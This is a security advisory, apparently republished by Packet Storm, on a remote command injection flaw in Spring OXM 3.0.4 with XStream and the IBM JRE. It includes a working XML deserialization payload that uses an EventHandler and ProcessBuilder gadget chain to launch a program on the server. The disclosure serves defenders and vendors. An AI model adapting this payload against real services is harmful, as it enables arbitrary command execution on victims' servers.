Spring Source OXM when XStream and IBM JRE are used suffers from a remote OS command injection vulnerability. The author wants Packet Storm to note publicly that he did not submit this to the site but only to Bugtraq, where Packet Storm picked it up in the public domain.
87ba9e7c1faa828a7bd5261fd40148a23f7e54568077dfddef334890891f0765Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics
CVSS: 7.6
AccessVector: Network
AccessComplexity: High
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Details:
Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.
This is an example of legitimate input:
<bicycle>
<name>unicycle</name>
<id>123</id>
<nbrWheels>1</nbrWheels>
<nbrRiders>1</nbrRiders>
</bicycle>
This malicious input will execute the notepad application on the server and open the C:\Windows\win.ini file
<bicycle class="java.util.TreeSet">
<no-comparator />
<object />
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>notepad.exe</string>
<string>c:\windows\win.ini</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</bicycle>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed